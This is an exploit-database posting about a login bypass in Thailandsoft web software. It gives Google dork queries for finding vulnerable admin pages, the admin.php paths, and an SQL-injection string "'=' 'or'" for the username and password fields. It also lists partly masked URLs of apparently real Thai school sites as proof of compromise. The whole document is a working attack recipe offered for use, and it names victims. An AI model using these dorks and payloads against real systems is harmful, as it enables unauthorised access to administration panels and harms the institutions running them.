Thailandsoft Login page Bypass Vulnerability

Posted on 14 October 2013
#********************************************************************************
# Exploit Title : Thailandsoft Login page Bypass Vulnerability 
#
# Exploit Author : Ashiyane Digital Security Team
#
# Software Link : Thailandsoft.com
#
# Tested on: Windows 7 , Linux
#
# Google Dork :  intext:"&#3626;&#3635;&#3627;&#3619;&#3633;&#3610;&#3648;&#3592;&#3657;&#3634;&#3627;&#3609;&#3657;&#3634;&#3607;&#3637;&#3656;" inurl:admin.php
#
# Google Dork 2 : intext:"&#3626;&#3635;&#3627;&#3619;&#3633;&#3610;&#3648;&#3592;&#3657;&#3634;&#3627;&#3609;&#3657;&#3634;&#3607;&#3637;&#3656;" inurl:v2/admin.php
#
Google Dork 3:  intext:"&#3648;&#3623;&#3655;&#3610;&#3652;&#3595;&#3605;&#3660;&#3650;&#3604;&#3618; Thailandsoft.com"
#
# Date: 2013/10/12
#
--------------------------------------------------------------------
# Exploit : Login page bypass
#
# Location : [Target]/v2/admin.php   Location 2 : [Target]/admin.php  
#
# Username : '=' 'or'
#
# Password : '=' 'or'
######################
# Proof:
#
# http://www.kuXmas.ac.th/v2/admin.php 
#
# http://www.manXya.ac.th/v2/main.php
#
# http://www.raXpun.ac.th/v2/admin.php
#
# http://www.sangXee.ac.th/v2/admin.php
#
# http://www.raXma.ac.th/v2/admin.php
#
######################
 Milad Hacking

We Love Mohammad
######################
TOP
Malware :

Last 20
Exploits :

Last 20